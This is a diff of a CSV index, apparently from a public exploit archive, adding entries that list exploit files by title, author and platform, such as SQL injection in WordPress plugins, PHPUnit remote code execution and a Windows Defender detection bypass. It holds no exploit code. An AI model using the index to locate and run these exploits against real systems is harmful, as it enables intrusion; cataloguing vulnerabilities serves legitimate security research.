 50130,exploits/windows/local/50130.py,"Argus Surveillance DVR 4.0 - Weak Password Encryption",1970-01-01,"Salman Asad",local,windows,
+50690,exploits/windows/local/50690.txt,"CONTPAQi(R) AdminPAQ 14.0.0 - Unquoted Service Path",1970-01-01,"Angel Canseco",local,windows,
 50135,exploits/linux/local/50135.c,"Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation",1970-01-01,TheFloW,local,linux,
 50184,exploits/windows/local/50184.txt,"Amica Prodigy 1.7 - Privilege Escalation",1970-01-01,"Andrea Intilangelo",local,windows,
 50188,exploits/android/local/50188.txt,"Xiaomi browser 10.2.4.g - Browser Search History Disclosure",1970-01-01,"Vishwaraj Bhattrai",local,android,
@@ -11434,6 +11435,8 @@ id,file,description,date,author,type,platform,port
 50654,exploits/windows/local/50654.txt,"Microsoft Windows Defender - Detections Bypass",1970-01-01,hyp3rlinx,local,windows,
 50664,exploits/windows/local/50664.txt,"WorkTime 10.20 Build 4967 - Unquoted Service Path",1970-01-01,"Yehia Elghaly",local,windows,
 50689,exploits/linux/local/50689.txt,"PolicyKit-1 0.105-31 - Privilege Escalation",1970-01-01,"Lance Biggerstaff",local,linux,
+50691,exploits/windows/local/50691.txt,"Mozilla Firefox 67 - Array.pop JIT Type Confusion",1970-01-01,"Forrest Orr",local,windows,
+50696,exploits/macos/local/50696.py,"Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)",1970-01-01,LiquidWorm,local,macos,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -44767,3 +44770,17 @@ id,file,description,date,author,type,platform,port
 50685,exploits/php/webapps/50685.txt,"WordPress Plugin Mortgage Calculators WP 1.52 - Stored Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Ceylan BOZOĞULLARINDAN",webapps,php,
 50686,exploits/php/webapps/50686.py,"WordPress Plugin RegistrationMagic V 5.0.1.5 - SQL Injection (Authenticated)",1970-01-01,"Ron Jost",webapps,php,
 50687,exploits/php/webapps/50687.py,"WordPress Plugin Modern Events Calendar V 6.1 - SQL Injection (Unauthenticated)",1970-01-01,"Ron Jost",webapps,php,
+50692,exploits/java/webapps/50692.txt,"Ametys CMS v4.4.1 - Cross Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,java,
+50693,exploits/php/webapps/50693.txt,"uBidAuction v2.0.1 - 'Multiple' Cross Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
+50694,exploits/php/webapps/50694.txt,"Chamilo LMS 1.11.14 - Account Takeover",1970-01-01,sirpedrotavares,webapps,php,
+50695,exploits/php/webapps/50695.py,"Wordpress Plugin Download Monitor WordPress V 4.4.4 - SQL Injection (Authenticated)",1970-01-01,"Ron Jost",webapps,php,
+50697,exploits/php/webapps/50697.txt,"WordPress Plugin Domain Check 1.0.16 - Reflected Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Ceylan BOZOĞULLARINDAN",webapps,php,
+50698,exploits/php/webapps/50698.py,"Wordpress Plugin 404 to 301 2.0.2 - SQL-Injection (Authenticated)",1970-01-01,"Ron Jost",webapps,php,
+50699,exploits/php/webapps/50699.txt,"PHP Restaurants 1.0 - SQLi (Unauthenticated)",1970-01-01,"Nefrit ID",webapps,php,
+50700,exploits/php/webapps/50700.txt,"Moodle 3.11.4 - SQL Injection",1970-01-01,lavclash75,webapps,php,
+50701,exploits/hardware/webapps/50701.txt,"Huawei DG8045 Router 1.0 - Credential Disclosure",1970-01-01,"Abdalrahman Gamal",webapps,hardware,
+50702,exploits/php/webapps/50702.py,"PHP Unit 4.8.28 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,souzo,webapps,php,
+50703,exploits/php/webapps/50703.txt,"WordPress Plugin Contact Form Check Tester 1.0.2 - Broken Access Control",1970-01-01,0xB9,webapps,php,
+50704,exploits/php/webapps/50704.txt,"WordPress Plugin Product Slider for WooCommerce 1.13.21 - Cross Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
+50705,exploits/php/webapps/50705.txt,"WordPress Plugin Post Grid 2.1.1 - Cross Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
+50706,exploits/php/webapps/50706.txt,"WordPress Plugin Learnpress 4.1.4.1 - Arbitrary Image Renaming",1970-01-01,"Ceylan BOZOĞULLARINDAN",webapps,php,